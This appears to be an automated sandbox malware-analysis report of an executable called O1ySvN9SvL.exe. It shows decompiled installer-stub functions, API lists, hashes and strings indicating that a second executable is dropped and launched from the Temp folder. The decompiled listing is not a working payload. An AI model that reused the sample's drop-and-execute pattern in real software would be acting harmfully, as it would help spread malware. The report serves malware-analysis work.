                Function 00404333 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 242stringCOMMON
                Download Yara Rule
                C-Code - Quality: 65%
                			E00404333(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr* _t81;
				int _t86;
				int _t88;
				int _t100;
				signed int _t105;
				char* _t110;
				intOrPtr _t112;
				intOrPtr _t113;
				intOrPtr* _t127;
				intOrPtr _t135;
				signed int _t139;
				signed int _t144;
				CHAR* _t150;

				_t75 =  *0x41fd00;
				_v36 = _t75;
				_t150 = ( *(_t75 + 0x3c) << 0xa) + 0x424000;
				_v12 =  *((intOrPtr*)(_t75 + 0x38));
				if(_a8 == 0x40b) {
					E004053A6(0x3fb, _t150);
					E00405D03(_t150);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							_t144 = _t143 | 0xffffffff;
							E004053A6(0x3fb, _t150);
							if(E004056C8(_t169, _t150) == 0) {
								_v8 = 1;
							}
							E00405AF4(0x41f4f8, _t150);
							_t80 = E0040567B(0x41f4f8);
							if(_t80 != 0) {
								 *_t80 =  *_t80 & 0x00000000;
							}
							_t81 = E00405DDA(0);
							if(_t81 == 0) {
								L29:
								_t86 = GetDiskFreeSpaceA(0x41f4f8,  &_v20,  &_v28,  &_v16,  &_v40);
								__eflags = _t86;
								if(_t86 == 0) {
									goto L32;
								}
								_t100 = _v20 * _v28;
								__eflags = _t100;
								_t144 = MulDiv(_t100, _v16, 0x400);
								goto L31;
							} else {
								_push( &_v32);
								_push( &_v24);
								_push( &_v44);
								_push(0x41f4f8);
								if( *_t81() == 0) {
									goto L29;
								}
								_t144 = (_v40 << 0x00000020 | _v44) >> 0xa;
								L31:
								_v12 = 1;
								L32:
								if(_t144 < E00404741(5)) {
									_v8 = 2;
								}
								_t135 =  *0x4236fc; // 0x74f2a0
								if( *((intOrPtr*)(_t135 + 0x10)) != 0) {
									E0040468C(0x3ff, 0xfffffffb, _t87);
									if(_v12 == 0) {
										SetDlgItemTextA(_a4, 0x400, 0x41f4e8);
									} else {
										E0040468C(0x400, 0xfffffffc, _t144);
									}
								}
								_t88 = _v8;
								 *0x423fc4 = _t88;
								if(_t88 == 0) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
									_v8 = 0;
								}
								E00403F17(0 | _v8 == 0x00000000);
								if(_v8 == 0 &&  *0x42051c == 0) {
									E004042C8();
								}
								 *0x42051c = 0;
								goto L46;
							}
						}
						_t169 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L46;
						}
						goto L22;
					}
					_t105 = _a12 & 0x0000ffff;
					if(_t105 != 0x3fb) {
						L12:
						if(_t105 == 0x3e9) {
							_t139 = 7;
							memset( &_v72, 0, _t139 << 2);
							_t143 = 0x420530;
							_v76 = _a4;
							_v68 = 0x420530;
							_v56 = E00404626;
							_v52 = _t150;
							_v64 = E00405B16(0x3fb, 0x420530, _t150);
							_t110 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t110, 0x41f900, _v12);
							if(_t110 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t110);
								E004055E7(_t150);
								_t112 =  *0x423f28; // 0x74d188
								_t113 =  *((intOrPtr*)(_t112 + 0x11c));
								if(_t113 != 0 && _t150 == "C:\\Users\\alfons\\AppData\\Local\\Temp") {
									_push(_t113);
									_push(0);
									E00405B16(0x3fb, 0x420530, _t150);
									_t143 = 0x422ec0;
									if(lstrcmpiA(0x422ec0, 0x420530) != 0) {
										lstrcatA(_t150, 0x422ec0);
									}
								}
								 *0x42051c =  *0x42051c + 1;
								SetDlgItemTextA(_a4, 0x3fb, _t150);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L46;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t143 = GetDlgItem(_a4, 0x3fb);
					if(E00405654(_t150) != 0 && E0040567B(_t150) == 0) {
						E004055E7(_t150);
					}
					 *0x4236f8 = _a4;
					SetWindowTextA(_t143, _t150);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403EF5(_a4);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403EF5(_a4);
					E00403F2A(_t143);
					_t127 = E00405DDA(7);
					if(_t127 == 0) {
						L46:
						return E00403F5C(_a8, _a12, _a16);
					}
					 *_t127(_t143, 1);
					goto L8;
				}
			}






































                0x00404339
                0x00404340
                0x0040434c
                0x0040435a
                0x00404362
                0x00404366
                0x0040436c
                0x0040436c
                0x00404378
                0x004043ea
                0x004043f1
                0x004044c6
                0x004044cd
                0x004044dc
                0x004044dc
                0x004044e0
                0x004044e6
                0x004044e9
                0x004044f6
                0x004044f8
                0x004044f8
                0x00404506
                0x0040450c
                0x00404513
                0x00404515
                0x00404515
                0x0040451a
                0x00404526
                0x0040454a
                0x0040455b
                0x00404561
                0x00404563
                0x00000000
                0x00000000
                0x00404569
                0x00404569
                0x00404577
                0x00000000
                0x00404528
                0x0040452b
                0x0040452f
                0x00404533
                0x00404534
                0x00404539
                0x00000000
                0x00000000
                0x00404541
                0x00404579
                0x00404579
                0x00404580
                0x00404589
                0x0040458b
                0x0040458b
                0x00404592
                0x0040459d
                0x004045a7
                0x004045af
                0x004045c5
                0x004045b1
                0x004045b5
                0x004045b5
                0x004045af
                0x004045ca
                0x004045cf
                0x004045d4
                0x004045dd
                0x004045dd
                0x004045e6
                0x004045e8
                0x004045e8
                0x004045f4
                0x004045fc
                0x00404606
                0x00404606
                0x0040460b
                0x00000000
                0x0040460b
                0x00404526
                0x004044cf
                0x004044d6
                0x00000000
                0x00000000
                0x00000000
                0x004044d6
                0x004043f7
                0x004043fd
                0x00404417
                0x0040441c
                0x00404426
                0x0040442d
                0x00404432
                0x0040443c
                0x0040443f
                0x00404442
                0x00404449
                0x00404451
                0x00404454
                0x00404458
                0x0040445f
                0x00404467
                0x004044bf
                0x00404469
                0x0040446a
                0x00404471
                0x00404476
                0x0040447b
                0x00404483
                0x0040448d
                0x0040448e
                0x00404490
                0x00404496
                0x004044a4
                0x004044a8
                0x004044a8
                0x004044a4
                0x004044ad
                0x004044b8
                0x004044b8
                0x00404467
                0x00000000
                0x0040441c
                0x0040440a
                0x00000000
                0x00000000
                0x00404410
                0x00000000
                0x0040437a
                0x00404385
                0x0040438e
                0x0040439b
                0x0040439b
                0x004043a5
                0x004043aa
                0x004043b3
                0x004043b6
                0x004043bb
                0x004043c3
                0x004043c6
                0x004043cb
                0x004043d1
                0x004043d8
                0x004043df
                0x00404611
                0x00404623
                0x00404623
                0x004043e8
                0x00000000
                0x004043e8

                APIs
                • GetDlgItem.USER32 ref: 0040437E
                • SetWindowTextA.USER32(00000000,?), ref: 004043AA
                • SHBrowseForFolderA.SHELL32(?,0041F900,?), ref: 0040445F
                • CoTaskMemFree.OLE32(00000000), ref: 0040446A
                • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,00420530,00000000,?,?), ref: 0040449C
                • lstrcatA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx), ref: 004044A8
                • SetDlgItemTextA.USER32 ref: 004044B8
                  • Part of subcall function 004053A6: GetDlgItemTextA.USER32 ref: 004053B9
                  • Part of subcall function 00405D03: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D5B
                  • Part of subcall function 00405D03: CharNextA.USER32(?,?,?,00000000), ref: 00405D68
                  • Part of subcall function 00405D03: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D6D
                  • Part of subcall function 00405D03: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\O1ySvN9SvL.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D7D
                • GetDiskFreeSpaceA.KERNEL32(0041F4F8,?,?,0000040F,?,00000000,0041F4F8,0041F4F8,?,?,000003FB,?), ref: 0040455B
                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404571
                • SetDlgItemTextA.USER32 ref: 004045C5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                • String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx
                • API String ID: 2246997448-1576356659
                • Opcode ID: cb80a268bf24ae7fe0fa1031d8768fc716fd5deb7f04e988c4d677ddd980eb03
                • Instruction ID: 4b0f1e9708c527d2056c04b062cf11215df66417efe2c712fcd6d6fb4e9790ff
                • Opcode Fuzzy Hash: cb80a268bf24ae7fe0fa1031d8768fc716fd5deb7f04e988c4d677ddd980eb03
                • Instruction Fuzzy Hash: 7B817CB1900218BBDB11AFA1DC45A9F7BB8EF45314F00843AFA05B62D1D77C9A41CF69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402078 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132comCOMMON
                Download Yara Rule
                C-Code - Quality: 74%
                			E00402078(void* __eflags) {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A85(0xfffffff0);
				_t96 = E00402A85(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A85(2);
				 *((intOrPtr*)(_t100 - 0x3c)) = E00402A85(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A85(0x45);
				if(E00405654(_t96) == 0) {
					E00402A85(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407380, _t75, 1, 0x407370, _t44);
				if(_t44 < _t75) {
					L12:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407390, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\alfons\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x3c)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x3c)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x34)));
						if(_t95 >= _t75) {
							 *0x40a800 = _t75;
							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x40a800, 0x400);
							_t69 =  *((intOrPtr*)(_t100 - 8));
							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x40a800, 1);
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L12;
					}
				}
				E00401423();
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                0x00402081
                0x0040208b
                0x00402094
                0x0040209e
                0x004020a7
                0x004020b1
                0x004020b5
                0x004020b5
                0x004020ba
                0x004020cb
                0x004020d3
                0x004021b1
                0x004021b1
                0x004021b8
                0x004020d9
                0x004020d9
                0x004020ea
                0x004020ee
                0x004020f4
                0x004020fe
                0x00402100
                0x0040210b
                0x0040210e
                0x0040211b
                0x0040211d
                0x0040211f
                0x00402126
                0x00402129
                0x00402129
                0x0040212c
                0x00402136
                0x0040213e
                0x00402143
                0x0040214f
                0x0040214f
                0x00402152
                0x0040215b
                0x0040215e
                0x00402167
                0x0040216c
                0x0040217e
                0x00402187
                0x0040218d
                0x00402199
                0x00402199
                0x0040219b
                0x004021a1
                0x004021a1
                0x004021a4
                0x004021aa
                0x004021af
                0x004021c4
                0x00000000
                0x00000000
                0x00000000
                0x004021af
                0x004021ba
                0x0040291d
                0x00402929

                APIs
                • CoCreateInstance.OLE32(00407380,?,00000001,00407370,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020CB
                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,0040A800,00000400,?,00000001,00407370,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402187
                Strings
                • C:\Users\user\AppData\Local\Temp, xrefs: 00402103
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: ByteCharCreateInstanceMultiWide
                • String ID: C:\Users\user\AppData\Local\Temp
                • API String ID: 123533781-1943935188
                • Opcode ID: 99d1c9485c2385a05d6def83f54491c2fe2eae754645da680941b60363c3e806
                • Instruction ID: 398a92e667fa01929b708865028928fdc90e398ffceaacaabec111818001f34d
                • Opcode Fuzzy Hash: 99d1c9485c2385a05d6def83f54491c2fe2eae754645da680941b60363c3e806
                • Instruction Fuzzy Hash: 96418E75A00204BFCB04EFA4CD88E9E7BB5EF89314B204169F905EB2D1CB799D41CB65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405DDA Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405DDA(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t2 = _t9 + 0x409298; // 0x4b004178
				_t7 =  *_t2;
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					_t3 = _t9 + 0x40929c; // 0x454e5245
					return GetProcAddress(_t5,  *_t3);
				}
				_t5 = LoadLibraryA(_t7);
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                0x00405de2
                0x00405de5
                0x00405de5
                0x00405dec
                0x00405df4
                0x00405e01
                0x00405e01
                0x00000000
                0x00405e08
                0x00405df7
                0x00405dff
                0x00000000
                0x00000000
                0x00405e10

                APIs
                • GetModuleHandleA.KERNEL32(4B004178,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405DEC
                • LoadLibraryA.KERNEL32(4B004178,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405DF7
                • GetProcAddress.KERNEL32(00000000,454E5245), ref: 00405E08
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: AddressHandleLibraryLoadModuleProc
                • String ID:
                • API String ID: 310444273-0
                • Opcode ID: 48fff7582a584f5b534c5f4fb96ac49351284891df118ff32f91dc10e886df39
                • Instruction ID: 23adcdfa12f808958732e8448d219f11259a2274de98c66bb9e29e692012a426
                • Opcode Fuzzy Hash: 48fff7582a584f5b534c5f4fb96ac49351284891df118ff32f91dc10e886df39
                • Instruction Fuzzy Hash: 27E0C232A08510ABD7118B20ED48D6B73ADEF897403080C3EF549F6190C734ED91EBEA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004026A1 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                Download Yara Rule
                C-Code - Quality: 39%
                			E004026A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A85(2), _t19 - 0x194) != 0xffffffff) {
					E00405A52(__edi, _t6);
					_push(_t19 - 0x168);
					_push(__esi);
					E00405AF4();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                0x004026b9
                0x004026cd
                0x004026d8
                0x004026d9
                0x00402840
                0x004026bb
                0x004026bb
                0x004026bd
                0x004026bf
                0x004026bf
                0x0040291d
                0x00402929

                APIs
                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026B0
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: FileFindFirst
                • String ID:
                • API String ID: 1974802433-0
                • Opcode ID: 13df6a17cce9b71cc0419ccd618343e2ee757eb231b356d374ab3b7a298b65eb
                • Instruction ID: 8527613b08e3aea83d48894234c8ec001628bfbd33843c806f329a49b4271005
                • Opcode Fuzzy Hash: 13df6a17cce9b71cc0419ccd618343e2ee757eb231b356d374ab3b7a298b65eb
                • Instruction Fuzzy Hash: 5DF0A7726051009BD700EBA49E49AEF7768DF11314F60057BE141F20C1D6B84A42DB2A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040403D Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 204windowstringCOMMON
                Download Yara Rule
                C-Code - Quality: 93%
                			E0040403D(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420510 =  *0x420510 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403F5C(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422ec0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423f24, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423f24, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420510 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fd00 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403F17(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004042C8();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x4236fc; // 0x74f2a0
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x423f58; // 0x74eb84
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00404009;
				E00403EF5(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403EF5(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403F17( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403F2A(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x423f28; // 0x74d188
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f4f4 =  *0x41f4f4 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420510 =  *0x420510 & 0x00000000;
				return 0;
			}




















                0x0040404d
                0x00404173
                0x004041cf
                0x004041d3
                0x004042aa
                0x004042ac
                0x004042ac
                0x004042b2
                0x004042b2
                0x004042b5
                0x00000000
                0x004042bc
                0x004041e1
                0x004041e3
                0x004041ed
                0x004041f8
                0x004041fb
                0x004041fe
                0x00404209
                0x0040420c
                0x00404213
                0x00404221
                0x00404239
                0x0040424c
                0x0040425c
                0x0040425e
                0x0040425e
                0x00404213
                0x00404268
                0x00000000
                0x00404273
                0x00404277
                0x00404288
                0x00404288
                0x0040428e
                0x0040429c
                0x0040429c
                0x00000000
                0x004042a0
                0x00404268
                0x0040417e
                0x00000000
                0x00404192
                0x00404198
                0x0040419e
                0x00000000
                0x00000000
                0x004041c3
                0x004041c5
                0x004041ca
                0x00000000
                0x004041ca
                0x0040417e
                0x00404053
                0x00404056
                0x0040405b
                0x0040405d
                0x0040406c
                0x0040406c
                0x0040406e
                0x00404073
                0x00404076
                0x00404078
                0x0040407d
                0x00404086
                0x0040408c
                0x00404098
                0x0040409b
                0x004040a4
                0x004040a9
                0x004040ac
                0x004040b1
                0x004040c8
                0x004040cf
                0x004040e2
                0x004040e5
                0x004040fa
                0x004040fc
                0x00404101
                0x00404106
                0x0040410b
                0x0040410b
                0x0040411a
                0x00404129
                0x0040412b
                0x00404141
                0x00404150
                0x00404152
                0x00000000

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                • String ID: @@$C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx$N$open
                • API String ID: 3615053054-3243811664
                • Opcode ID: f2281ac8f2863318c5f22e1f494ebc6a86efa03034e808f678c97fda4e75fe7b
                • Instruction ID: 2736236621597dd84b1265fd00406a521608d9db3f880d2da7511b3895ae30a3
                • Opcode Fuzzy Hash: f2281ac8f2863318c5f22e1f494ebc6a86efa03034e808f678c97fda4e75fe7b
                • Instruction Fuzzy Hash: 0161D1B1A40309BBEB109F60DC45B6A7BB9FB44715F10407AFB05BA2D1C7B8A9518F98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
